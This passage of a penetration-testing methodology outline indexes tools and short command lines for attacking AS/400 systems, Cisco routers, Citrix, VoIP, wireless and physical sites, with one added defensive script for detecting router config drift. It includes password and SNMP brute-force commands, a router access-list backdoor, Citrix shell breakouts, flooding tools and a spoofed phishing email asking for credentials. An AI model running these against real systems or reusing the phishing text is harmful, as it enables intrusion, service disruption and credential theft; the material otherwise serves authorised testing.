18.3.2. Nessus (Linux), Nessus (Windows)

18.3.3. NGS Typhon

18.3.4. NGS Squirrel for Oracle

18.3.5. NGS Squirrel for SQL

18.3.6. SARA

18.3.7. MatriXay

18.3.8. BiDiBlah

18.3.9. SSA

18.3.10. Oval Interpreter

18.3.11. Xscan

18.3.12. Security Manager +

18.3.13. Inguma

18.4. Resources

18.4.1. Security Focus

18.4.2. Microsoft Security Bulletin

18.4.3. Common Vulnerabilities and Exploits (CVE)

18.4.4. National Vulnerability Database (NVD)

18.4.5. The Open Source Vulnerability Database (OSVDB) - Standalone Database, Update URL

18.4.6. United States Computer Emergency Response Team (US-CERT)

18.4.7. Computer Emergency Response Team

18.4.8. Mozilla Security Information

18.4.9. SANS

18.4.10. Securiteam

18.4.11. PacketStorm Security

18.4.12. Security Tracker

18.4.13. Secunia


18.4.15. ntbugtraq

18.4.16. Wireless Vulnerabilities and Exploits (WVE)

18.5. Blogs

18.5.1. Carnal0wnage

18.5.2. Fsecure Blog

18.5.3. g0ne blog

18.5.4. GNUCitizen

18.5.5. ha.ckers Blog

18.5.6. Jeremiah Grossman Blog

18.5.7. Metasploit

18.5.8. nCircle Blogs

18.5.9. pentest

18.5.10. Rational Security

18.5.11. Rise Security

18.5.12. Security Fix Blog

18.5.13. Software Vulnerability Exploitation Blog

18.5.14. Taosecurity Blog

19. AS/400 Auditing

19.1. Remote

19.1.1. Information Gathering. Nmap using common iSeries (AS/400) services: unsecured services (Port; name; description), secured services (Port; name; description). NetCat (old school technique): nc -v -z -w target ListOfServices.txt | grep "open". Banner grabbing: Telnet, FTP, HTTP banner, POP3, SNMP, SMTP.

19.1.2. Users Enumeration. Default AS/400 user accounts. Error messages: Telnet login errors, POP3 authentication errors. Qsys symbolic link (if FTP is enabled): ftp target, then: quote stat; quote site namefmt 1; cd /; quote site listfmt 1; mkdir temp; quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys'); quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys'); dir /temp/qsys/*.usrprf. LDAP: need the os400-sys value from ibm-slapdSuffix; tool to browse LDAP.

19.1.3. Exploitation. CVE references: CVE-2005-1244 (Severity: High, CVSS: 7.0); CVE-2005-1243 (Severity: Low, CVSS: 3.3); CVE-2005-1242 (Severity: Low, CVSS: 3.3); CVE-2005-1241 (Severity: High, CVSS: 7.0); CVE-2005-1240 (Severity: High, CVSS: 7.0); CVE-2005-1239 (Severity: Low, CVSS: 3.3); CVE-2005-1238 (Severity: High, CVSS: 9.0); CVE-2005-1182 (Severity: Low, CVSS: 3.3); CVE-2005-1133 (Severity: Low, CVSS: 3.3); CVE-2005-1025 (Severity: Low, CVSS: 3.3); CVE-2005-0868 (Severity: High, CVSS: 7.0); CVE-2005-0899 (Severity: Low, CVSS: 2.3); CVE-2002-1822 (Severity: Low, CVSS: 3.3); CVE-2002-1731 (Severity: Low, CVSS: 2.3); CVE-2000-1038 (Severity: Low, CVSS: 3.3); CVE-1999-1279 (Severity: Low, CVSS: 3.3); CVE-1999-1012 (Severity: Low, CVSS: 3.3). Access with Work Station Gateway: http://target:5061/WSG. Default AS/400 accounts. Network attacks (next release): DB2, QSHELL, hijacking terminals, Trojan attacks, hacking from AS/400.

19.2. Local

19.2.1. System Value Security (recommended value is 30)

19.2.2. Password Policy

19.2.3. Audit level (recommended value is *SECURITY)

19.2.4. Documentation: user classes, system audit settings, special authorities definitions

20. Bluetooth Specific Testing

20.1. Bluescanner

20.2. Bluesweep

20.3. btscanner

20.4. Redfang

20.5. Blueprint

20.6. Bluesnarfer

20.7. Bluebugger

20.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

20.8. Blueserial

20.9. Bloover

20.10. Bluesniff

20.11. Exploit Frameworks

20.11.1. BlueMaho

20.12. Resources

20.12.1. URLs: Bluejackers, bluetooth-pentest, Trifinite

20.12.2. Vulnerability Information: Common Vulnerabilities and Exploits (CVE). Vulnerabilities and exploit information relating to these products can be found here:

20.12.3. White Papers: Bluesnarfing

21. Cisco Specific Testing

21.1. Methodology

21.1.1. Scan & Fingerprint. If SNMP is active, then community string guessing should be performed.

21.1.2. Credentials Guessing. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings, as they can lead to the config files of the router and therefore the 'enable' password!

21.1.3. Connect. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

21.1.4. Check for bugs. The most widely known/ used are: Nessus, Retina, GFI LanGuard and Core Impact. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

21.1.5. Further your attack. running-config is the currently running configuration. It is loaded from the startup-config on boot. This configuration is editable and changes take effect immediately, but any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network. startup-config is the boot-up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network. #> access-list 100 permit ip <IP> any
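
The running-config/startup-config distinction above is also what a defender uses to spot this kind of change: an entry that exists in the running config but was never written to startup-config is either unsaved legitimate work or tampering, and either way deserves a look. The following is an added example, not code from the Penetration Testing Framework page; both configurations are constructed samples, with the running config carrying one extra access-list entry of the kind the text describes.

```python
"""Detect drift between a Cisco IOS running-config and its startup-config.

Added example, not code from the Penetration Testing Framework page. Both
configurations below are constructed samples; the running config carries one
extra access-list entry that was never written back to startup-config.
"""
import difflib
import re

STARTUP_CONFIG = """\
hostname edge-rtr
!
interface FastEthernet0/0
 ip address 192.0.2.1 255.255.255.0
 ip access-group 100 in
!
access-list 100 permit tcp 192.0.2.0 0.0.0.255 any eq 443
access-list 100 deny ip any any log
!
line vty 0 4
 transport input ssh
!
end
"""

# Same device, but a blanket permit for one outside address has been added
# to the running config only (constructed to illustrate the case in the text).
RUNNING_CONFIG = STARTUP_CONFIG.replace(
    "access-list 100 permit tcp",
    "access-list 100 permit ip 198.51.100.7 any\naccess-list 100 permit tcp",
)

# Statement types where any drift should be treated as a security finding.
SENSITIVE = re.compile(
    r"^(access-list|ip access-list|ip route|line vty|username|enable|snmp-server)\b"
)


def config_lines(text):
    """Normalise a config dump: drop '!' separators and blank lines."""
    return [line.rstrip() for line in text.splitlines()
            if line.strip() and not line.startswith("!")]


def config_drift(startup, running):
    """Return (added, removed): lines only in running / only in startup."""
    diff = difflib.unified_diff(config_lines(startup), config_lines(running),
                                fromfile="startup-config", tofile="running-config",
                                lineterm="", n=0)
    added, removed = [], []
    for line in diff:
        if line.startswith(("---", "+++", "@@")):
            continue  # file headers and hunk markers, not config content
        if line.startswith("+"):
            added.append(line[1:])
        elif line.startswith("-"):
            removed.append(line[1:])
    return added, removed


def sensitive_drift(lines):
    """Keep only drifted statements that change access or credentials."""
    return [line for line in lines if SENSITIVE.match(line.strip())]


if __name__ == "__main__":
    added, removed = config_drift(STARTUP_CONFIG, RUNNING_CONFIG)
    for line in sensitive_drift(added):
        print("unsaved and sensitive:", line)
    for line in sensitive_drift(removed):
        print("removed from running config:", line)
```

IOS can produce the same comparison on the box with `show archive config differences`; doing it from collected copies additionally lets a backup or monitoring system alert on drift without logging into every device, and the `SENSITIVE` filter keeps cosmetic changes (descriptions, banners) out of the alert.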

21.2. Scan & Fingerprint.

21.2.1. Port Scanning: nmap. Other tools: mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

21.2.2. Fingerprinting: BT cisco-torch-0.4b # -A. TCP port scan: nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

21.3. Password Guessing.

21.3.1. ./CAT -h <IP> -a password.wordlist

21.3.2. ./enabler <IP> [-u username] -p password /password.wordlist [port]

21.3.3. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco

21.4. SNMP Attacks.

21.4.1. ./CAT -h <IP> -w SNMP.wordlist

21.4.2. onesixtyone -c SNMP.wordlist <IP>
BT onesixtyone-0.3.2 # onesixtyone -c dict.txt
Scanning 1 hosts, 64 communities
[enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
[Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug

21.4.3. snmpwalk -v <Version> -c <Community string> <IP>

21.5. Connecting.

21.5.1. Telnet: telnet <IP>. Sample banners

21.5.2. SSH

21.5.3. Web Browser. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following: Authentication Required. Enter username and password for "level_15_access" at. User Name: Password: Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

21.5.4. TFTP. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names. ./ <options> <IP,hostname,network> or ./ <options> -F <hostlist>. Creating backdoors in Cisco IOS using TCL

21.6. Known Bugs.

21.6.1. Attack Tools. Web browse to the Cisco device: http://<IP>. ./ios-w3-vul fetch > /tmp/router.txt

21.6.2. Common Vulnerabilities and Exploits (CVE) Information. Vulnerabilities and exploit information relating to these products can be found here:

21.7. Configuration Files.

21.7.1. Configuration files explained. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access. Password Encryption Utilised. Configuration Testing Tools: Nipper, fwauto (Beta)

21.8. References.

21.8.1. Cisco IOS Exploitation Techniques

22. Citrix Specific Testing

22.1. Citrix provides remote access services to multiple users across a wide range of platforms. I have put together the following information, which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix.

22.2. Enumeration

22.2.1. Web search. Google (GHDB): ext:ica inurl:citrix/metaframexp/default/login.asp ; [WFClient] Password= filetype:ica ; inurl:citrix/metaframexp/default/login.asp? ClientDetection=On ; inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" ; inurl:/Citrix/Nfuse17/ ; inurl:Citrix/MetaFrame/default/default.aspx. Google Hacks (author discovered): filetype:ica Username= ; inurl:/Citrix/AccessPlatform/ ; inurl:LogonAgent/Login.asp ; inurl:/CITRIX/NFUSE/default/login.asp ; inurl:/Citrix/NFuse161/login.asp ; inurl:/Citrix/NFuse16 ; inurl:/Citrix/NFuse151/ ; allintitle:MetaFrame XP Login ; allintitle:MetaFrame Presentation Server Login ; inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On ; allintitle:Citrix(R) NFuse(TM) Classic Login. Yahoo: originurlextension:ica

22.2.2. Site search. Manually review the web page for useful information; review the source of the web page.

22.2.3. generic nmap -A -PN -p 80,443,1494 ip_address amap -bqv ip_address port_no.

22.2.4. Citrix specific: perl ip_address; enum.js (enum.js apps TCPBrowserAddress=ip_address); connect.js (connect.js TCPBrowserAddress=ip_address Application=advertised-application); Citrix-pa-scan (perl ip_address [timeout] > pas.wri); pabrute.c (./pabrute pubapp list app_list ip_address)

22.2.5. Default Ports. TCP: Citrix XML Service, Advanced Management Console, Citrix SSL Relay, ICA sessions, server to server, Management Console to server, Session Reliability (auto-reconnect), License Management Console, license server. UDP: clients to ICA browser service, server-to-server.

22.2.6. nmap NSE scripts. citrix-enum-apps: nmap -sU --script=citrix-enum-apps -p 1604 <host>. citrix-enum-apps-xml: nmap --script=citrix-enum-apps-xml -p 80,443 <host>. citrix-enum-servers: nmap -sU --script=citrix-enum-servers -p 1604 <host>. citrix-enum-servers-xml: nmap --script=citrix-enum-servers-xml -p 80,443 <host>. citrix-brute-xml: nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

22.3. Scanning

22.3.1. Nessus Plugins: CGI abuses; CGI abuses: Cross Site Scripting (XSS); Misc.; Service Detection; Web Servers; Windows

22.3.2. Nikto: perl -host ip_address -port port_no.

22.4. Exploitation

22.4.1. Alter default .ica files: InitialProgram=cmd.exe or InitialProgram=explorer.exe

22.4.2. Enumerate and Connect. Pas: for applications identified by Citrix-pa-scan. Citrix-pa-proxy: for published applications with a Citrix client when the master browser is non-public.

22.5. Brute Force

22.5.1. bforce.js: bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2 or bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

22.6. Review Configuration Files

22.6.1. Application server configuration file appsrv.ini: location; world writeable; review other files; sample file

22.6.2. Program Neighborhood configuration file pn.ini: location; review other files; sample file

22.6.3. Citrix ICA client configuration file wfclient.ini: location

22.7. References

22.7.1. Vulnerabilities: Art of Hacking, Common Vulnerabilities and Exploits (CVE), Sample file, OSVDB, Secunia, SecurityFocus

22.7.2. Support: Citrix Knowledge Base, Thinworld

22.7.3. Exploits: Milw0rm, Art of Hacking Citrix

22.7.4. Tools Resource: zip file containing the majority of the tools mentioned in this article, for easy download/ access

23. Network Backbone

23.1. Generic Toolset

23.1.1. Wireshark (formerly Ethereal). Passive sniffing of usernames/passwords: email, FTP, HTTP, HTTPS, RDP, VoIP, other. Filters: ip.src == ip_address ; ip.dst == ip_address ; tcp.dstport == port_no. ; ! ip.addr == ip_address ; (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

23.1.2. Cain & Abel. Active sniffing: ARP cache poisoning, DNS poisoning, routing protocols

23.1.3. Cisco-Torch ./ <options> <IP,hostname,network> or ./ <options> -F <hostlist>

23.1.4. NTP-Fingerprint perl -t [ip_address]

23.1.5. Yersinia

23.1.6. p0f ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

23.1.7. Manual Check (Credentials required)

23.1.8. MAC Spoofing: MAC address changer for Windows; macchanger (random MAC address: macchanger -r eth0); madmacs; smac; TMAC

24. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or various engines exist that are, at the lowest level, essentially pre-compiled point-and-shoot tools. These engines also have a number of extra underlying features for more advanced users.

24.1. Password Attacks

24.1.1. Known Accounts: identified passwords, unidentified hashes

24.1.2. Default Accounts: identified passwords, unidentified hashes

24.2. Exploits

24.2.1. Successful Exploits: accounts, passwords, groups, other details, services, backdoor connectivity

24.2.2. Unsuccessful Exploits

24.2.3. Resources: Securiteam (exploits are sorted by year and must be downloaded individually); SecurityForest (updated via CVS after initial install); GovernmentSecurity (need to create an account to obtain access); Red Base Security (Oracle exploit site only); Wireless Vulnerabilities & Exploits (WVE) (wireless exploit site); PacketStorm Security (exploits downloadable by month and year, but no indexing carried out); SecWatch (exploits sorted by year and month, downloaded separately); SecurityFocus (exploits must be downloaded individually); Metasploit (install and regularly update via svn); Milw0rm (exploit archive indexed and sorted by port, downloadable as a whole - the one to go for!)

24.3. Tools

24.3.1. Metasploit: Free, Extra Modules, local copy

24.3.2. Manual SQL Injection: Understanding SQL Injection; SQL Injection walkthrough; SQL Injection by example; Blind SQL Injection; Advanced SQL Injection in SQL Server; More Advanced SQL Injection; Advanced SQL Injection in Oracle databases; SQL Cheatsheets

24.3.3. SQL Power Injector

24.3.4. SecurityForest

24.3.5. SPI Dynamics WebInspect

24.3.6. Core Impact

24.3.7. Cisco Global Exploiter

24.3.8. PIXDos: perl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n]

24.3.9. CANVAS

24.3.10. Inguma

25. Server Specific Tests

25.1. Databases

25.1.1. Direct Access Interrogation. MS SQL Server: ports, version, osql. Oracle: ports, TNS Listener, SQL Plus, default account/passwords, default SIDs. MySQL: ports, version, users/passwords. DB2. Informix. Sybase. Other.

25.1.2. Scans: default ports, non-default ports, instance names, versions

25.1.3. Password Attacks: sniffed passwords, cracked passwords, hashes, direct access guesses

25.1.4. Vulnerability Assessment. Automated: reports, vulnerabilities. Manual: patch levels, confirmed vulnerabilities.

25.2. Mail

25.2.1. Scans

25.2.2. Fingerprint: manual, automated

25.2.3. Spoofable. Telnet spoof:
telnet target_IP 25
helo target.com
mail from: [email protected] to: [email protected]: [email protected]: []
X-Originating-Email: [[email protected]]
MIME-Version: 1.0
To: <[email protected]>
From: < [email protected] >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Dear Valued Customer, The corporate network has recently gone through a critical update to the Active Directory; we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire. Please go to the following website and log in with your account details. <a href=></a> Online Security Manager.
Target [email protected]

25.2.4. Relays

25.3. VPN

25.3.1. Scanning: 500 UDP (IPSEC), 1723 TCP (PPTP), 443 TCP/SSL. nmap -sU -PN -p 500 ; ipsecscan

25.3.2. Fingerprinting: ike-scan --showbackoff

25.3.3. PSK Crack: ikeprobe, then sniff for responses with Cain & Abel (C&A) or ikecrack

25.4. Web

25.4.1. Vulnerability Assessment. Automated: reports, vulnerabilities. Manual: patch levels, confirmed vulnerabilities.

25.4.2. Permissions: PUT /test.txt HTTP/1.0 ; CONNECT HTTP/1.0 ; POST HTTP/1.0 with Content-Type: text/plain and Content-Length: 6

25.4.3. Scans

25.4.4. Fingerprinting. Other. HTTP: commands, modules, file extensions. HTTPS: commands, file extensions.

25.4.5. Directory Traversal

26. VoIP Security

26.1. Sniffing Tools

26.1.1. AuthTool

26.1.2. Cain & Abel

26.1.3. Etherpeek

26.1.4. NetDude

26.1.5. Oreka

26.1.6. PSIPDump

26.1.7. SIPomatic

26.1.8. SIPv6 Analyzer

26.1.9. UCSniff

26.1.10. VoiPong

26.1.11. VOMIT

26.1.12. Wireshark

26.1.13. WIST - Web Interface for SIP Trace

26.2. Scanning and Enumeration Tools

26.2.1. enumIAX

26.2.2. fping

26.2.3. IAX Enumerator

26.2.4. iWar

26.2.5. Nessus

26.2.6. Nmap

26.2.7. SIP Forum Test Framework (SFTF)

26.2.8. SIPcrack

26.2.9. sipflanker: python 192.168.1-254

26.2.10. SIP-Scan

26.2.11. SIP.Tastic

26.2.12. SIPVicious

26.2.13. SiVuS

26.2.14. SMAP: smap IP_Address/Subnet_Mask ; smap -o IP_Address/Subnet_Mask ; smap -l IP_Address

26.2.15. snmpwalk

26.2.16. VLANping

26.2.17. VoIPAudit

26.2.18. VoIP GHDB Entries

26.2.19. VoIP Voicemail Database

26.3. Packet Creation and Flooding Tools

26.3.1. H.323 Injection Files

26.3.2. H225regreject

26.3.3. IAXHangup

26.3.4. IAXAuthJack

26.3.5. IAX.Brute

26.3.6. IAXFlooder: ./iaxflood sourcename destinationname numpackets

26.3.7. INVITE Flooder: ./inviteflood interface target_user target_domain ip_address_target no_of_packets

26.3.8. kphone-ddos

26.3.9. RTP Flooder

26.3.10. rtpbreak

26.3.11. Scapy

26.3.12. Seagull

26.3.13. SIPBomber

26.3.14. SIPNess

26.3.15. SIPp

26.3.16. SIPsak. Tracing paths: sipsak -T -s sip:[email protected]. OPTIONS request: sipsak -vv -s sip:[email protected]. Query registered bindings: sipsak -I -C empty -a password -s sip:[email protected]

26.3.17. SIP-Send-Fun

26.3.18. SIPVicious

26.3.19. Spitter

26.3.20. TFTP Brute Force: perl <tftpserver> <filelist> <maxprocesses>

26.3.21. UDP Flooder: ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

26.3.22. UDP Flooder (with VLAN support): ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN_ID no_of_packets

26.3.23. Voiphopper

26.4. Fuzzing Tools

26.4.1. Asteroid

26.4.2. Codenomicon VoIP Fuzzers

26.4.3. Fuzzy Packet

26.4.4. Mu Security VoIP Fuzzing Platform

26.4.5. ohrwurm RTP Fuzzer

26.4.6. PROTOS H.323 Fuzzer

26.4.7. PROTOS SIP Fuzzer

26.4.8. SIP Forum Test Framework (SFTF)

26.4.9. Sip-Proxy

26.5. Signaling Manipulation Tools

26.5.1. AuthTool: ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

26.5.2. BYE Teardown

26.5.3. Check Sync Phone Rebooter

26.5.4. RedirectPoison

26.5.5. Registration Adder

26.5.6. Registration Eraser

26.5.7. Registration Hijacker

26.5.8. SIP-Kill

26.5.9. SIP-Proxy-Kill

26.5.10. SIP-RedirectRTP

26.5.11. vnak

26.6. Media Manipulation Tools

26.6.1. RTP InsertSound: ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

26.6.2. RTP MixSound: ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

26.6.3. RTPProxy

26.6.4. RTPInject

26.7. Generic Software Suites

26.7.1. OAT - Office Communication Server Tool Assessment

26.7.2. EnableSecurity VOIPPACK. Note: add-on for Immunity Canvas

26.8. References

26.8.1. URLs: Common Vulnerabilities and Exploits (CVE) (vulnerabilities and exploit information relating to these products can be found here:); Default Passwords; Hacking Exposed VoIP Tool Pre-requisites; VoIPsa

26.8.2. White Papers: An Analysis of Security Threats and Tools in SIP-Based VoIP Systems; An Analysis of VoIP Security Threats and Tools; Hacking VoIP Exposed; Security testing of SIP implementations; SIP Stack Fingerprinting and Stack Difference Attacks; Two attacks against VoIP; VoIP Attacks!; VoIP Security Audit Program (VSAP)

26.8.3. Spirent ThreatEx

27. Wireless Penetration

27.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All of this information is needed to give the tester (and hence the customer) a clear and concise picture of the network being assessed. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.

27.1.1. Site Map. RF map: lines of sight, signal coverage. Physical map: triangulate APs, satellite imagery.

27.1.2. Network Map. MAC filter: authorised MAC addresses, reaction to spoofed MAC addresses. Encryption keys utilised: WEP, WPA/PSK, 802.1x. Access points: ESSID, BSSIDs. Wireless clients: MAC addresses, intercepted traffic.

27.2. SipRogue

27.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:;line=xtrfgy>"

27.4. Wireless Toolkit

27.4.1. Wireless Discovery: Aerosol, Airfart, Aphopper, Apradar, BAFFLE, inSSIDer, iWEPPro, karma, KisMAC-ng, Kismet, MiniStumbler, Netstumbler, Vistumbler, Wellenreiter, Wifi Hopper, WirelessMon, WiFiFoFum

27.4.2. Packet Capture: Airopeek, Airpcap, Airtraf, Apsniff, Cain, Commview, Ettercap, Netmon, nmwifi, Wireshark

27.4.3. EAP Attack tools: eapmd5pass (eapmd5pass -w dictionary_file -r eapmd5-capture.dump)

27.4.4. LEAP Attack Tools: asleap, thc leap cracker, anwrap

27.4.5. WEP/ WPA Password Attack Tools: Airbase, Aircrack-ptw, Aircrack-ng, Airsnort, cowpatty, FiOS Wireless Key Calculator, iWifiHack, KisMAC-ng, Rainbow Tables, wep attack, wep crack, wzcook

27.4.6. Frame Generation Software: Airgobbler, airpwn, Airsnarf, Commview, fake ap, void11, wifi tap (wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]), FreeRADIUS - Wireless Pwnage Edition

27.4.7. Mapping Software. Online mapping: WIGLE, Skyhook. Tools: Knsgem

27.4.8. File Format Conversion Tools: ns1 recovery and conversion tool, warbable, warkizniz (warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]), ivstools

27.4.9. IDS Tools: WIDZ, War Scanner, Snort-Wireless, AirDefense, AirMagnet

27.5. WLAN discovery

27.5.1. Unencrypted WLAN. Visible SSID: sniff for IP range. Hidden SSID: deauth client.

27.5.2. WEP encrypted WLAN. Visible SSID: WEPattack. Hidden SSID: deauth client.

27.5.3. WPA / WPA2 encrypted WLAN: deauth client, capture EAPOL handshake

27.5.4. LEAP encrypted WLAN: deauth client, break LEAP

27.5.5. 802.1x WLAN: create rogue access point (Airsnarf, fake ap, Hotspotter, Karma, Linux rogue AP)

27.5.6. Resources. URLs: Russix, Wireless Vulnerabilities and Exploits (WVE). White papers: Weaknesses in the Key Scheduling Algorithm of RC4; 802.11b Firmware-Level Attacks; Wireless Attacks from an Intrusion Detection Perspective; Implementing a Secure Wireless Network for a Windows Environment; Breaking 104 bit WEP in less than 60 seconds; PEAP (Shmoocon 2008, Wright & Antoniewicz); Active behavioral fingerprinting of wireless devices. Common Vulnerabilities and Exploits (CVE): vulnerabilities and exploit information relating to these products can be found here:

28. Physical Security

28.1. Building Security

28.1.1. Meeting Rooms: check for active network jacks; check for any information in the room.

28.1.2. Lobby: check for active network jacks. Does the receptionist/guard leave the lobby? Accessible printers? Print a test page. Obtain phone/personnel listing.

28.1.3. Communal Areas: check for active network jacks; check for any information in the room; listen for employee conversations.

28.1.4. Room Security. Resistance of locks to picking: what type of locks are used in the building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors? Ceiling access areas: can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

28.1.5. Windows: check windows/doors for visible intruder alarm sensors. Check visible areas for sensitive information. Can you video users logging on?

28.2. Perimeter Security

28.2.1. Fence Security: attempt to verify that the whole of the perimeter fence is unbroken.

28.2.2. Exterior Doors: if there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.

28.2.3. Guards. Patrol routines: analyse patrol timings to ascertain if any holes exist in the coverage. Communications: intercept and analyse guard communications; determine if the communication methods can be used to aid a physical intrusion.

28.3. Entry Points

28.3.1. Guarded Doors. Piggybacking: attempt to closely follow employees into the building without having to show valid credentials. Fake ID: attempt to use fake ID to gain access. Access methods: test 'out of hours' entry methods.

28.3.2. Unguarded Doors: identify all unguarded entry points. Are doors secured? Check locks for resistance to lock picking.

28.3.3. Windows: check windows/doors for visible intruder alarm sensors. Attempt to bypass sensors.

28.4. Office Waste

28.4.1. Dumpster Diving: attempt to retrieve any useful information from ToE refuse. This may include printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs, etc.

29. Final Report - template

30. Contributors

30.1. Matt Byrne (

30.1.1. Matt contributed the majority of the Wireless section.

30.2. Arvind Doraiswamy (

30.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

30.3. Lee Lawson (

30.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

30.4. Nabil OUCHN (